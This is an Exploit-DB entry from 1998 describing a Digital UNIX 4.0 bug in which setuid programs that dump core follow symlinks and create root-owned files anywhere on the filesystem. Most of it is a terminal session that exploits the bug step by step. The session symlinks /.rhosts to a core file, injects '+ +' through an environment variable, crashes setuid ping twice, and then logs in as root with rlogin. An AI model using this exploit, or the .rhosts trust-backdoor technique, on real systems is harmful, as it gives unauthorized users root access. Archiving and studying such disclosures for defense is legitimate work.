Digital UNIX 4.0/4.0 B/4.0 D - SUID/SGID Core File

EDB-ID:

19068

CVE:





Platform:

Unix

Date:

1998-04-06


source: https://www.securityfocus.com/bid/74/info

Digital UNIX 4.0 will follow symlinks while writting core files if two setuid programs dump core in sucession. The core file is owned by root but with the user's groud id. The core file permissions are 0600. This can be used to create root owned file anywhere in the filesystem.

$ ls -l /.rhosts
/.rhosts not found
$ ls -l /usr/sbin/ping
-rwsr-xr-x 1 root bin 32768 Nov 16 1996 /usr/sbin/ping
$ ln -s /.rhosts core
$ IMP='
>+ +
>'
$ ping somehost &
[1] 1337
$ ping somehost &
[2] 31337
$ kill -11 31337
$ kill -11 1337
[1] Segmentation fault /usr/sbin/ping somehost (core dumped)
[2] +Segmentation fault /usr/sbin/ping somehost (core dumped)
$ ls -l /.rhosts
-rw------- 1 root system 385024 Mar 29 05:17 /.rhosts
##/.rhosts has been created....that's all.##
$ rlogin localhost -l root